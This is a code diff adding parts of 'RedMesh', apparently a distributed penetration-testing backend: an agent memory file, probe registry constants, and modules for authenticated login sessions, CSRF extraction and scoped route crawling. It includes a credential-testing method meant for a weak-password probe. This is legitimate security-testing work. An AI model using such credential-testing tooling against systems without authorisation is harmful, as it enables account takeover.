diff --git a/extensions/business/cybersec/red_mesh/AGENTS.md b/extensions/business/cybersec/red_mesh/AGENTS.md new file mode 100644 index 00000000..bc950fd3 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/AGENTS.md @@ -0,0 +1,308 @@ +# RedMesh Backend Agent Memory + +Last updated: 2026-03-16T17:05:00Z + +## Purpose + +This file is the durable, append-only long-term memory for future agents working in the RedMesh backend implementation directory: + +- [`extensions/business/cybersec/red_mesh/`](./) + +Use it to preserve: +- code-level architecture facts +- backend-specific invariants +- important debugging references +- critical pitfalls +- timestamped memory entries for meaningful backend changes and major development stages + +Do not rewrite history. Corrections belong in new log entries that reference earlier ones. + +## Scope + +This `AGENTS.md` is RedMesh-backend-specific. + +Use the workspace-level memory for cross-repo planning and project-wide context: +- project-level RedMesh workspace `AGENTS.md` + +Use this file for: +- backend implementation memory +- module boundaries +- orchestration and persistence invariants +- testing and debugging conventions +- significant backend change history + +## Stable References + +### Core Entry Points + +- [`pentester_api_01.py`](./pentester_api_01.py) +- [`redmesh_llm_agent_api.py`](./redmesh_llm_agent_api.py) + +### Core Subsystems + +- [`services/`](./services) +- [`repositories/`](./repositories) +- [`models/`](./models) +- [`mixins/`](./mixins) +- [`worker/`](./worker) +- [`graybox/`](./graybox) + +### Key Supporting Modules + +- [`constants.py`](./constants.py) +- [`findings.py`](./findings.py) +- [`cve_db.py`](./cve_db.py) + +### Tests + +- [`tests/`](./tests) +- [`test_redmesh.py`](./test_redmesh.py) + +### Historical Context + +- [`.old_docs/HISTORY.md`](./.old_docs/HISTORY.md) + +## Architecture Snapshot + +RedMesh is a distributed pentest backend running on Ratio1 edge nodes. It coordinates scans across nodes, stores job state in CStore, persists large artifacts in R1FS, and exposes FastAPI endpoints consumed by Navigator and local operators. + +High-level responsibilities: +- launch and coordinate network and graybox jobs +- distribute work across edge nodes +- track runtime progress +- aggregate worker reports +- finalize archives and derived metadata +- optionally run LLM analysis on aggregated reports +- expose audit, archive, report, progress, triage, and analysis APIs + +### Current Major Boundaries + +- `pentester_api_01.py` + - main orchestration plugin + - launch endpoints + - process-loop coordination + - API read paths + +- `services/` + - extracted lifecycle, query, launch, state-machine, control, finalization, resilience, and secret-handling logic + +- `repositories/` + - storage boundaries for CStore and R1FS-style artifacts + +- `models/` + - typed job/config/archive/report/triage structures + +- `worker/` + - network worker implementation and feature-specific probe modules + +- `graybox/` + - authenticated webapp scan models, runtime flow, auth lifecycle, safety gates, and probe families + +- `mixins/` + - live progress, reporting, risk scoring, attestation, and LLM behavior extracted from the main plugin + +## Critical Invariants + +### Storage and Ownership + +- CStore job records are the shared orchestration state for distributed work. +- R1FS stores large immutable artifacts such as reports, configs, and archives. +- Finalized jobs are represented in CStore as stubs plus `job_cid`; archive payloads are authoritative for finalized history. +- Read paths for finalized data should prefer archive-backed retrieval over assuming live CStore detail still exists. + +### Job Lifecycle + +- Launcher node is responsible for distributed orchestration and finalization. +- Workers are selected per job and assigned explicit ranges/config. +- Aggregated analysis should run on the combined multi-worker report, not a single-worker report. +- A job should converge to an explicit terminal state; indefinite `RUNNING` due to a missing worker is a bug. + +### Findings and Reports + +- Structured findings are the backend contract; string-only vulnerability outputs are legacy history, not the target model. +- Severity, evidence, remediation, and typed finding metadata should remain normalized across network and graybox paths. +- Mutable analyst triage state must remain separate from immutable scan/archive records. + +### Security and Secret Handling + +- Archive/report redaction is not equivalent to secure secret persistence. +- Graybox secret storage boundaries are security-sensitive and should be treated as architecture, not cosmetic cleanup. +- Safe defaults matter for redaction, ICS-safe behavior, rate limiting, and authorization confirmation. + +### Distributed Runtime State + +- Shared job blobs are vulnerable to lost-update races if multiple nodes write unrelated fields concurrently. +- Worker-owned runtime state should prefer isolated records over concurrent writes into the same job document. +- Launcher-side reconciliation is safer than trusting many workers to merge shared orchestration state correctly. +- Nested config blocks should resolve through one shared shallow merge helper, with validation kept in subsystem-specific wrappers. + +## Testing and Verification + +Primary backend test commands: + +```bash +cd edge_node +python -m pytest extensions/business/cybersec/red_mesh/test_redmesh.py -v +``` + +```bash +cd edge_node +python -m pytest extensions/business/cybersec/red_mesh/tests -v +``` + +Useful targeted runs: + +```bash +cd edge_node +python -m pytest extensions/business/cybersec/red_mesh/tests/test_api.py -v +``` + +```bash +cd edge_node +python -m pytest extensions/business/cybersec/red_mesh/tests/test_regressions.py -v +``` + +```bash +cd edge_node +python -m pytest extensions/business/cybersec/red_mesh/tests/test_state_machine.py -v +``` + +## Debugging Conventions + +- Prefer reading both live API state and persisted logs when investigating distributed-job issues. +- For finalized-job read bugs, verify whether the true source of truth is CStore stub data or archive data in R1FS. +- For stuck distributed jobs, inspect: + - launcher job record + - per-worker status/progress visibility + - whether every assigned worker actually observed the job + - whether missing workers were unhealthy at assignment time +- Distinguish clearly between: + - scan execution failures + - orchestration failures + - archive/read-path failures + - LLM post-processing failures + +## Pitfalls + +- `get_job_status` can look locally “complete” while the distributed job is still incomplete. +- Finalized jobs are pruned to CStore stubs; assuming live pass reports remain in CStore is incorrect. +- Shared CStore writes without guarded semantics can lose unrelated updates. +- LLM failure and analysis retrieval are separate problems; missing analysis text is not always a UI issue. +- Graybox and network paths now share more contracts than before; avoid fixing one while silently breaking the other. + +## Mandatory BUILDER-CRITIC Loop + +For every meaningful RedMesh backend modification, future agents must record and follow this loop in their work output and, for critical/fundamental changes, summarize the result in the Memory Log. + +### 1. BUILDER + +State: +- intent +- files or systems to change +- expected behavioral change + +### 2. CRITIC + +Adversarially try to break the change: +- wrong assumptions +- orchestration/storage mismatches +- regressions +- security impact +- distributed-state edge cases +- missing tests +- missing docs +- operational risks + +### 3. BUILDER Response + +Refine or defend the change: +- what changed after critique +- what remains risky +- exact verification commands +- actual verification results + +Minimum bar: +- no meaningful RedMesh backend change is complete without a documented CRITIC pass +- no critical orchestration/storage change is complete without verification commands and results +- if verification cannot run, record that explicitly + +## Memory Log (append-only) + +Only append entries for critical or fundamental RedMesh backend changes, discoveries, or horizontal insights. Do not add routine edits. + +### 2025-08-27 to 2025-10-04 + +- Stage: initial RedMesh backend creation and early productionization. +- Change: established the original distributed pentest backend with `pentester_api_01.py`, `PentestLocalWorker`, basic service probes, and early web checks. +- Change: added the first test suite and expanded protocol/web coverage beyond basic banner grabbing. +- Horizontal insight: RedMesh started as a network-first scanning backend and only later grew into a richer orchestration and analysis platform. + +### 2025-12-08 to 2025-12-22 + +- Stage: distributed orchestration hardening and feature-catalog expansion. +- Change: added startup coordination fixes, chainstore handling fixes, and a major overhaul of multi-node job coordination. +- Change: introduced the feature catalog and explicit capability-driven execution model in [`constants.py`](./constants.py). +- Horizontal insight: the December 2025 update was the major transition from a simple scanner plugin to a configurable distributed scanning platform. + +### 2026-01-28 to 2026-02-19 + +- Stage: worker-state fixes, LLM integration, deep probes, structured findings, and web architecture refactor. +- Change: fixed worker-entry handling from CStore, then added DeepSeek-backed LLM analysis through a dedicated agent path. +- Change: expanded deep service probes across SSH, FTP, Telnet, HTTP, TLS, databases, and infrastructure protocols. +- Change: split monolithic web logic into OWASP-aligned mixins and completed the migration to structured findings plus CVE matching. +- Horizontal insight: by 2026-02-19, structured findings became the core backend contract and should be treated as foundational rather than optional formatting. + +### 2026-02-20 + +- Stage: security-control baseline added across backend and Navigator integration. +- Change: added credential redaction, ICS safe mode, rate limiting, scanner identity controls, audit logging, and authorization gating. +- Horizontal insight: RedMesh security controls affect the full path from UI input to backend runtime and archive persistence; future changes should be reviewed end-to-end, not only in the plugin code. + +### 2026-03-07 to 2026-03-10 + +- Stage: observability and backend decomposition. +- Change: added live worker progress endpoints, per-thread metrics/ports visibility, node IP stamping, hard stop support, purge/delete flows, and improved progress loading. +- Change: refactored a growing monolith into more granular mixins, worker modules, and split tests. +- Horizontal insight: progress and observability became first-class runtime concerns, not just UI convenience features. + +### 2026-03-10 to 2026-03-11 + +- Stage: graybox architecture introduction and typed execution boundaries. +- Change: introduced graybox core modules, auth/discovery/safety flows, worker/API integration, launch API split by scan type, feature capability modeling by scan type, and extracted launch strategies/state machine. +- Change: expanded graybox probes and tests, including access control, business logic, misconfiguration, and injection families. +- Horizontal insight: RedMesh is no longer only a distributed port scanner; it is a dual-mode backend with both network and authenticated webapp execution paths. +- Critical continuity rule: future agents must treat network and graybox paths as coupled contracts wherever findings, progress, launch state, and archive/read behavior overlap. + +### 2026-03-12 + +- Stage: service extraction, repository/model boundaries, pass-cap hardening, and stronger storage design. +- Change: extracted query, launch, lifecycle, repository, and service boundaries from `pentester_api_01.py`. +- Change: enforced continuous-pass caps, normalized running-job state, introduced repository boundaries, and split graybox secrets from plain job config. +- Horizontal insight: after this stage, RedMesh backend work should prefer service/repository/model boundaries over adding more behavior directly to the monolithic plugin file. +- Critical continuity rule: storage-affecting work should flow through the typed repository/model/service boundaries unless there is a clear reason not to. + +### 2026-03-13 + +- Stage: secret-boundary hardening, typed graybox artifacts, finding triage, resilience, and regression coverage. +- Change: hardened secret-storage boundaries, typed graybox runtime/probe/evidence flows, normalized graybox finding contracts, added finding triage state and CVSS metadata, and strengthened resilience/launch policy. +- Change: added regression and contract suites, hardened live progress metadata, hardened LLM failure handling, and preserved pass reports during finalization. +- Horizontal insight: RedMesh now has explicit architecture around evidence artifacts, triage state, and regression protection; future work should extend those contracts rather than bypass them. + +### 2026-03-16 + +- Change: added this backend-local [`AGENTS.md`](./AGENTS.md) to keep RedMesh-specific implementation memory separate from workspace-level planning memory. +- Change: identified a distributed-job orchestration gap where an assigned worker can miss the initial CStore job announcement and the launcher can wait indefinitely. +- Change: added a companion implementation tracker for distributed job reconciliation in the shared RedMesh project docs. +- Horizontal insight: current launcher/worker orchestration is strong enough to distribute work, but not yet strong enough to guarantee convergence when a peer misses assignment visibility; future agents should treat worker-owned runtime state and launcher-side reconciliation as the preferred fix direction. + +### 2026-03-16T17:05:00Z + +- Change: extracted a generic nested-config resolver in [`services/config.py`](./services/config.py) and moved distributed job reconciliation config onto that shared path. +- Horizontal insight: RedMesh should centralize nested config block merge semantics, but keep validation local to each subsystem wrapper rather than introducing a broad deep-merge config framework prematurely. + +### 2026-03-16T20:40:00Z + +- Change: introduced a dedicated LLM payload-shaping boundary in [`mixins/llm_agent.py`](./mixins/llm_agent.py) so RedMesh no longer sends the full aggregated report directly to the LLM path. +- Change: added network and webapp-specific compact payload shaping, finding deduplication/ranking/capping, analysis-type budgets, and runtime payload-size observability. +- Verification: the known failing job `a3a357bc` dropped from `303,760` raw bytes to `21,559` shaped bytes for `security_assessment` and completed manually in `38.97s` on rm1 instead of timing out. +- Horizontal insight: RedMesh archive/report data and LLM reasoning data must remain separate contracts; future LLM work should extend the bounded payload model rather than re-coupling the agent to raw archived aggregates. diff --git a/extensions/business/cybersec/red_mesh/constants.py b/extensions/business/cybersec/red_mesh/constants.py index d6face4a..f9eb9670 100644 --- a/extensions/business/cybersec/red_mesh/constants.py +++ b/extensions/business/cybersec/red_mesh/constants.py @@ -2,6 +2,33 @@ RedMesh constants and feature catalog definitions. """ +from enum import Enum + + +class ScanType(str, Enum): + """Scan type enum — extensible for future scan types (api, mobile, etc.).""" + NETWORK = "network" + WEBAPP = "webapp" + + +# Graybox probe registry — decouples probe addition from worker code. +# Adding a new probe = new probe file + new registry entry. No worker changes. +# Capabilities (requires_auth, requires_regular_session, is_stateful) live on +# the ProbeBase subclass, not in the registry — single source of truth. +GRAYBOX_PROBE_REGISTRY = [ + {"key": "_graybox_access_control", "cls": "access_control.AccessControlProbes"}, + {"key": "_graybox_misconfig", "cls": "misconfig.MisconfigProbes"}, + {"key": "_graybox_injection", "cls": "injection.InjectionProbes"}, + {"key": "_graybox_business_logic", "cls": "business_logic.BusinessLogicProbes"}, +] + +# Graybox timing and limits +GRAYBOX_DEFAULT_DELAY = 0.2 +GRAYBOX_WEAK_AUTH_DELAY = 1.0 +GRAYBOX_MAX_WEAK_ATTEMPTS = 20 +GRAYBOX_SESSION_MAX_AGE = 1800 + + FEATURE_CATALOG = [ { "id": "service_info_common", @@ -100,9 +127,33 @@ "description": "Post-scan analysis: honeypot detection, OS consistency, infrastructure leak aggregation.", "category": "correlation", "methods": ["_post_scan_correlate"] - } + }, + { + "id": "graybox", + "label": "Authenticated webapp testing", + "description": "OWASP-mapped application probes requiring login credentials: IDOR, privilege escalation, business logic, misconfiguration, injection, SSRF, and weak authentication.", + "category": "graybox", + "methods": [entry["key"] for entry in GRAYBOX_PROBE_REGISTRY] + ["_graybox_weak_auth"], + }, ] + +NETWORK_FEATURE_CATEGORIES = ("service", "web", "correlation") +NETWORK_FEATURE_REGISTRY = { + category: tuple( + method + for item in FEATURE_CATALOG + if item.get("category") == category + for method in item.get("methods", []) + ) + for category in NETWORK_FEATURE_CATEGORIES +} +NETWORK_FEATURE_METHODS = tuple( + method + for category in NETWORK_FEATURE_CATEGORIES + for method in NETWORK_FEATURE_REGISTRY[category] +) + # Job status constants JOB_STATUS_RUNNING = "RUNNING" JOB_STATUS_COLLECTING = "COLLECTING" # Launcher merging worker reports @@ -246,12 +297,6 @@ JOB_ARCHIVE_VERSION = 1 MAX_CONTINUOUS_PASSES = 100 -# ===================================================================== -# Live progress publishing -# ===================================================================== - -PROGRESS_PUBLISH_INTERVAL = 10 # seconds between progress updates to CStore - # Scan phases in execution order (5 phases total) PHASE_ORDER = ["port_scan", "fingerprint", "service_probes", "web_tests", "correlation"] PHASE_MARKERS = { @@ -260,3 +305,9 @@ "web_tests": "web_tests_completed", "correlation": "correlation_completed", } + +# Graybox scan phases in execution order +GRAYBOX_PHASE_ORDER = [ + "preflight", "authentication", "discovery", "graybox_probes", + "weak_auth", +] diff --git a/extensions/business/cybersec/red_mesh/docs/resume-checkpoint-boundary.md b/extensions/business/cybersec/red_mesh/docs/resume-checkpoint-boundary.md new file mode 100644 index 00000000..ff68b84e --- /dev/null +++ b/extensions/business/cybersec/red_mesh/docs/resume-checkpoint-boundary.md @@ -0,0 +1,34 @@ +# RedMesh Resume and Checkpoint Boundary + +This document records the Phase 6 checkpoint boundary without implementing resumable execution yet. + +## Safe to Resume + +- Archive read queries can be retried because they are immutable reads. +- Archive verification after write can be retried because it does not mutate job state. +- LLM analysis calls can be retried because the pass report is updated only after a successful response. +- Attestation submission can be retried before the attestation result is persisted into job state. + +## Restart From Scratch + +- Active worker execution inside a pass must restart from the beginning of the pass. +- Graybox authenticated probe execution must restart from a fresh authentication flow. +- Partial pass aggregation must restart from collected worker reports rather than replaying mid-pass state. + +## Checkpoint Candidates + +- Immutable `job_config_cid` +- Completed `pass_reports` +- Finalized `job_cid` +- Mutable `job_revision` +- Triage state and triage audit + +## Explicit Non-Goals + +- No mid-pass resume token +- No worker-side checkpoint serialization +- No replay of partially completed graybox sessions + +## Design Rule + +RedMesh may resume only from durable, integrity-checked boundaries that are already represented as immutable artifacts or explicit mutable orchestration records. Any state that depends on live sockets, authenticated sessions, or partial aggregation must restart. diff --git a/extensions/business/cybersec/red_mesh/findings.py b/extensions/business/cybersec/red_mesh/findings.py index 17b08ef8..ea1a7a83 100644 --- a/extensions/business/cybersec/red_mesh/findings.py +++ b/extensions/business/cybersec/red_mesh/findings.py @@ -32,6 +32,8 @@ class Finding: owasp_id: str = "" # e.g. "A07:2021" cwe_id: str = "" # e.g. "CWE-287" confidence: str = "firm" # certain | firm | tentative + cvss_score: float | None = None + cvss_vector: str = "" def probe_result(*, raw_data: dict = None, findings: list = None) -> dict: diff --git a/extensions/business/cybersec/red_mesh/graybox/__init__.py b/extensions/business/cybersec/red_mesh/graybox/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/extensions/business/cybersec/red_mesh/graybox/auth.py b/extensions/business/cybersec/red_mesh/graybox/auth.py new file mode 100644 index 00000000..9a502572 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/auth.py @@ -0,0 +1,379 @@ +""" +Authentication manager for graybox scanning. + +Handles CSRF auto-detection, login with robust success detection, +session expiry, re-auth, and cleanup. +""" + +import re +import time + +import requests + +from ..constants import GRAYBOX_SESSION_MAX_AGE +from .models.target_config import COMMON_CSRF_FIELDS +from .models import GrayboxAuthState + + +class AuthManager: + MAX_AUTH_ATTEMPTS = 2 + AUTH_RETRY_DELAY_SECONDS = 0.25 + + """ + Manages authenticated HTTP sessions for graybox probes. + + Handles CSRF auto-detection, login with robust success detection, + session expiry, re-auth, and cleanup. + """ + + def __init__(self, target_url, target_config, verify_tls=True): + self.target_url = target_url.rstrip("/") + self.target_config = target_config + self.verify_tls = verify_tls + + self.anon_session = None + self.official_session = None + self.regular_session = None + self._created_at = 0.0 + self._refresh_count = 0 + self._auth_errors = [] + self._detected_csrf_field = None + + @property + def detected_csrf_field(self) -> str | None: + """Public read access to the auto-detected CSRF field name.""" + return self._detected_csrf_field + + @property + def is_expired(self) -> bool: + return time.time() - self._created_at > GRAYBOX_SESSION_MAX_AGE + + @property + def auth_state(self) -> GrayboxAuthState: + return GrayboxAuthState( + created_at=self._created_at, + refresh_count=self._refresh_count, + official_authenticated=self.official_session is not None, + regular_authenticated=self.regular_session is not None, + auth_errors=tuple(self._auth_errors), + ) + + def needs_refresh(self, require_regular=False) -> bool: + if self.is_expired: + return True + if self.official_session is None: + return True + if require_regular and self.regular_session is None: + return True + return False + + def ensure_sessions(self, official_creds, regular_creds=None): + """Re-authenticate if sessions are stale or not yet created.""" + regular_creds = self._coerce_creds(regular_creds) + require_regular = bool(regular_creds and regular_creds.get("username")) + if not self.needs_refresh(require_regular=require_regular): + return True + self.cleanup() + self._refresh_count += 1 + auth_ok = self.authenticate(official_creds, regular_creds) + if not auth_ok: + self.cleanup() + return auth_ok + + def authenticate(self, official_creds, regular_creds=None): + """Create fresh sessions for all configured users.""" + self.anon_session = self._make_session() + official_creds = self._coerce_creds(official_creds) + regular_creds = self._coerce_creds(regular_creds) + self._auth_errors = [] + + self.official_session = self._try_login_with_retry( + "official", + official_creds["username"], + official_creds["password"], + ) + if not self.official_session: + return False + + if regular_creds and regular_creds.get("username"): + self.regular_session = self._try_login_with_retry( + "regular", + regular_creds["username"], + regular_creds["password"], + ) + if not self.regular_session: + self._record_auth_error("regular_login_failed") + + self._created_at = time.time() + return True + + @staticmethod + def _coerce_creds(creds): + if creds is None: + return None + if isinstance(creds, dict): + return { + "username": creds.get("username", ""), + "password": creds.get("password", ""), + } + return { + "username": getattr(creds, "username", "") or "", + "password": getattr(creds, "password", "") or "", + } + + def cleanup(self): + """ + Explicitly close sessions and attempt logout. + + Prevents session accumulation on targets with session limits. + """ + logout_url = self.target_url + self.target_config.logout_path + for session in [self.official_session, self.regular_session]: + if session is None: + continue + try: + session.get(logout_url, timeout=5) + except requests.RequestException: + pass + finally: + session.close() + if self.anon_session: + self.anon_session.close() + self.official_session = None + self.regular_session = None + self.anon_session = None + self._created_at = 0.0 + + def preflight_check(self) -> str | None: + """ + Verify target reachability and login page existence. + + Returns error message if preflight fails, None if OK. + """ + # 1. Target reachable? + try: + requests.head( + self.target_url, + timeout=10, + verify=self.verify_tls, + allow_redirects=True, + ) + except requests.RequestException as exc: + return f"Target unreachable: {exc}" + + # 2. Login page exists? + login_url = self.target_url + self.target_config.login_path + try: + resp = requests.get(login_url, timeout=10, verify=self.verify_tls) + if resp.status_code == 404: + return f"Login page not found: {login_url} returned 404" + except requests.RequestException as exc: + return f"Login page unreachable: {exc}" + + return None + + def _make_session(self): + s = requests.Session() + s.verify = self.verify_tls + return s + + def make_anonymous_session(self): + """ + Public API for creating anonymous sessions. + + Used by probes that need a fresh session for lockout detection + or anonymous endpoint testing. + """ + return self._make_session() + + def try_credentials(self, username, password): + """ + Public API for credential testing (used by weak-auth probe). + + Returns a Session on success (caller must close it), None on failure. + """ + return self._try_login(username, password) + + def _record_auth_error(self, code): + self._auth_errors.append(code) + + def _try_login_with_retry(self, principal, username, password): + retryable_failure = False + for attempt in range(1, self.MAX_AUTH_ATTEMPTS + 1): + session, retryable_failure = self._try_login_attempt(username, password) + if session is not None: + return session + if not retryable_failure: + break + if attempt < self.MAX_AUTH_ATTEMPTS: + time.sleep(self.AUTH_RETRY_DELAY_SECONDS) + + if retryable_failure: + self._record_auth_error(f"{principal}_login_transport_error") + else: + self._record_auth_error(f"{principal}_login_failed") + return None + + def _try_login(self, username, password): + """ + Attempt login with CSRF auto-detection and robust success detection. + """ + session, _ = self._try_login_attempt(username, password) + return session + + def _try_login_attempt(self, username, password): + """ + Attempt one login and classify whether failure is retryable. + """ + session = self._make_session() + login_url = self.target_url + self.target_config.login_path + + # GET login page + try: + resp = session.get(login_url, timeout=10, allow_redirects=True) + except requests.RequestException: + session.close() + return None, True + + # Auto-detect or use configured CSRF field + csrf_field, csrf_token = self._extract_csrf(resp.text) + + payload = { + self.target_config.username_field: username, + self.target_config.password_field: password, + } + headers = {"Referer": login_url} + if csrf_token and csrf_field: + payload[csrf_field] = csrf_token + headers["X-CSRFToken"] = csrf_token + + try: + resp = session.post( + login_url, data=payload, headers=headers, + timeout=10, allow_redirects=True, + ) + except requests.RequestException: + session.close() + return None, True + + # Robust success detection + if self._is_login_success(resp, session, login_url): + return session, False + + session.close() + return None, False + + def _is_login_success(self, response, session, login_url): + """ + Determine if login succeeded. + + Checks (in order): + 1. HTTP error -> fail + 2. Response body contains failure markers -> fail + 3. JSON error responses -> fail + 4. Redirected away from login page AND cookies present -> success + 5. Non-empty session cookies -> success + """ + if response.status_code >= 400: + return False + + # Check for failure markers in response body. + # Use multi-word phrases to avoid false matches — single words like + # "failed" can appear in legitimate post-login content. + failure_markers = [ + "invalid credentials", "invalid username", "invalid password", + "incorrect password", "login failed", "authentication failed", + "try again", "wrong password", "unable to log in", + "account locked", "account disabled", + ] + body_lower = response.text.lower() + if any(marker in body_lower for marker in failure_markers): + return False + + # SPA support: check JSON error responses + ct = response.headers.get("content-type", "") + if "application/json" in ct: + try: + data = response.json() + if isinstance(data, dict): + if data.get("error") or data.get("success") is False or data.get("authenticated") is False: + return False + except ValueError: + pass + + has_cookies = bool(session.cookies.get_dict()) + + # Redirect away from login URL — require cookies to confirm + # session was actually established. + if response.url and "login" not in response.url.lower(): + if has_cookies: + return True + + # Redirect chain present and final URL differs AND cookies set + if response.history and login_url not in response.url: + if has_cookies: + return True + + # Has auth-relevant cookies (even without redirect — SPA logins) + return has_cookies + + def _extract_csrf(self, html): + """ + Extract CSRF token from HTML. + + If csrf_field is configured, use it directly. + Otherwise, try common framework field names. + Returns (field_name, token_value) tuple. + """ + if self.target_config.csrf_field: + token = self._find_csrf_value(html, self.target_config.csrf_field) + return (self.target_config.csrf_field, token) + + # Auto-detect: try common CSRF field names + if self._detected_csrf_field: + token = self._find_csrf_value(html, self._detected_csrf_field) + if token: + return (self._detected_csrf_field, token) + + for field_name in COMMON_CSRF_FIELDS: + token = self._find_csrf_value(html, field_name) + if token: + self._detected_csrf_field = field_name + return (field_name, token) + + # Fallback: any hidden input with "csrf" or "token" in name + m = re.search( + r']+type=["\']hidden["\'][^>]+name=["\']([^"\']*(?:csrf|token)[^"\']*)["\'][^>]+value=["\']([^"\']+)', + html or "", re.IGNORECASE, + ) + if m: + self._detected_csrf_field = m.group(1) + return (m.group(1), m.group(2)) + + return (None, None) + + @staticmethod + def extract_csrf_value(html, field_name): + """ + Public API for CSRF value extraction from HTML. + + Used by probes that need to include CSRF tokens in form submissions. + """ + return AuthManager._find_csrf_value(html, field_name) + + @staticmethod + def _find_csrf_value(html, field_name): + """Find value of a named hidden input field.""" + # Try name->value order + m = re.search( + rf'name=["\']?{re.escape(field_name)}["\']?\s[^>]*value=["\']([^"\']+)', + html or "", re.IGNORECASE, + ) + if m: + return m.group(1) + # Try value->name order (some frameworks emit attrs differently) + m = re.search( + rf'value=["\']([^"\']+)["\'][^>]*name=["\']?{re.escape(field_name)}["\']?', + html or "", re.IGNORECASE, + ) + return m.group(1) if m else None diff --git a/extensions/business/cybersec/red_mesh/graybox/discovery.py b/extensions/business/cybersec/red_mesh/graybox/discovery.py new file mode 100644 index 00000000..b44aea12 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/discovery.py @@ -0,0 +1,197 @@ +""" +Route and form discovery for graybox scanning. + +BFS crawl with scope boundaries, page/depth limits, +and form collection without blind POSTs. +""" + +import posixpath +from collections import deque +from html.parser import HTMLParser +from urllib.parse import urljoin, urlparse + +import requests + +from .models import DiscoveryResult + + +class _RouteParser(HTMLParser): + """Extract href and form action attributes from HTML.""" + + def __init__(self): + super().__init__() + self.links = [] + self.forms = [] + + def handle_starttag(self, tag, attrs): + attrs_map = dict(attrs) + if tag == "a" and attrs_map.get("href"): + self.links.append(attrs_map["href"]) + if tag == "form" and attrs_map.get("action"): + self.forms.append(attrs_map["action"]) + + +class DiscoveryModule: + """ + Route and form discovery with scope boundaries. + + Scope constraints: + - Same-origin only: external domain links are ignored + - Optional path prefix: only crawl under scope_prefix + - Depth/page limits: prevent unbounded crawling + - Form actions recorded but NOT followed (no blind POSTs) + """ + + def __init__(self, target_url, auth_manager, safety, target_config): + self.target_url = target_url.rstrip("/") + self.auth = auth_manager + self.safety = safety + self._target_host = urlparse(target_url).netloc + self._scope_prefix = target_config.discovery.scope_prefix + self._max_pages = target_config.discovery.max_pages + self._max_depth = target_config.discovery.max_depth + self.routes = [] + self.forms = [] + + def discover(self, known_routes=None): + """ + Discover application routes and forms. + + Combines user-supplied routes with crawled routes. + Respects scope boundaries and page/depth limits. + """ + visited = set() + to_visit = deque([("/", 0)]) + + if known_routes: + for route in known_routes: + if self._in_scope(route): + to_visit.append((route, 0)) + + all_routes = set() + all_forms = set() + + while to_visit and len(visited) < self._max_pages: + path, depth = to_visit.popleft() + if path in visited: + continue + visited.add(path) + + self.safety.throttle() + + # Use authenticated session if available, else anonymous + session = self.auth.official_session or self.auth.anon_session + if session is None: + break + + url = self.target_url + path + try: + resp = session.get(url, timeout=10, allow_redirects=True) + except requests.RequestException: + continue + + all_routes.add(path) + + if "text/html" not in resp.headers.get("Content-Type", ""): + continue + + parser = _RouteParser() + try: + parser.feed(resp.text) + except Exception: + continue + + # Process discovered links (scope enforcement) + if depth < self._max_depth: + for link in parser.links: + normalized = self._normalize(link) + if normalized and normalized not in visited and self._in_scope(normalized): + to_visit.append((normalized, depth + 1)) + + # Record form actions but do NOT follow them + for action in parser.forms: + normalized = self._normalize(action) + if normalized and self._in_scope(normalized): + all_forms.add(normalized) + + result = self.discover_result(known_routes=known_routes) + return result.to_tuple() + + def discover_result(self, known_routes=None) -> DiscoveryResult: + """Discover application routes/forms and return a typed result.""" + visited = set() + to_visit = deque([("/", 0)]) + + if known_routes: + for route in known_routes: + if self._in_scope(route): + to_visit.append((route, 0)) + + all_routes = set() + all_forms = set() + + while to_visit and len(visited) < self._max_pages: + path, depth = to_visit.popleft() + if path in visited: + continue + visited.add(path) + + self.safety.throttle() + + session = self.auth.official_session or self.auth.anon_session + if session is None: + break + + url = self.target_url + path + try: + resp = session.get(url, timeout=10, allow_redirects=True) + except requests.RequestException: + continue + + all_routes.add(path) + + if "text/html" not in resp.headers.get("Content-Type", ""): + continue + + parser = _RouteParser() + try: + parser.feed(resp.text) + except Exception: + continue + + if depth < self._max_depth: + for link in parser.links: + normalized = self._normalize(link) + if normalized and normalized not in visited and self._in_scope(normalized): + to_visit.append((normalized, depth + 1)) + + for action in parser.forms: + normalized = self._normalize(action) + if normalized and self._in_scope(normalized): + all_forms.add(normalized) + + self.routes = sorted(all_routes) + self.forms = sorted(all_forms) + return DiscoveryResult(routes=self.routes, forms=self.forms) + + def _normalize(self, raw): + """Normalize a link to a same-origin, canonicalized path.""" + if not raw or raw.startswith(("#", "javascript:", "mailto:")): + return "" + joined = urljoin(self.target_url + "/", raw) + parsed = urlparse(joined) + # Same-origin check + if parsed.netloc and parsed.netloc != self._target_host: + return "" + # Canonicalize path to collapse ".." segments + path = posixpath.normpath(parsed.path or "/") + # normpath strips trailing slash; preserve it for directory-style paths + if (parsed.path or "").endswith("/") and not path.endswith("/"): + path += "/" + return path + + def _in_scope(self, path): + """Check if path is within the configured scope prefix.""" + if not self._scope_prefix: + return True + return path.startswith(self._scope_prefix) diff --git a/extensions/business/cybersec/red_mesh/graybox/findings.py b/extensions/business/cybersec/red_mesh/graybox/findings.py new file mode 100644 index 00000000..f022f786 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/findings.py @@ -0,0 +1,160 @@ +""" +Structured findings for authenticated webapp (graybox) probes. + +GrayboxFinding is the probe-level finding type. It is converted to a +unified flat finding dict (matching blackbox findings) at the report +level via to_flat_finding(). The blackbox Finding in findings.py is +NOT modified. +""" + +from __future__ import annotations + +from dataclasses import dataclass, asdict, field +from typing import Any + + +@dataclass(frozen=True) +class GrayboxEvidenceArtifact: + """Typed graybox evidence payload kept alongside legacy string summaries.""" + summary: str = "" + request_snapshot: str = "" + response_snapshot: str = "" + captured_at: str = "" + raw_evidence_cid: str = "" + sensitive: bool = False + + @classmethod + def from_value(cls, value: Any) -> "GrayboxEvidenceArtifact": + if isinstance(value, GrayboxEvidenceArtifact): + return value + if isinstance(value, dict): + return cls( + summary=value.get("summary", "") or "", + request_snapshot=value.get("request_snapshot", "") or "", + response_snapshot=value.get("response_snapshot", "") or "", + captured_at=value.get("captured_at", "") or "", + raw_evidence_cid=value.get("raw_evidence_cid", "") or "", + sensitive=bool(value.get("sensitive", False)), + ) + if isinstance(value, str): + return cls(summary=value) + return cls() + + def to_dict(self) -> dict[str, Any]: + return asdict(self) + + +@dataclass(frozen=True) +class GrayboxFinding: + """ + Structured finding from an authenticated web-application probe. + + Uses structured evidence (list of key=value strings), multiple CWEs, + MITRE ATT&CK IDs, and explicit status outcomes. Separate type from + blackbox Finding — the two are normalized into a unified flat finding + dict at the report level by _compute_risk_and_findings(). + """ + scenario_id: str # 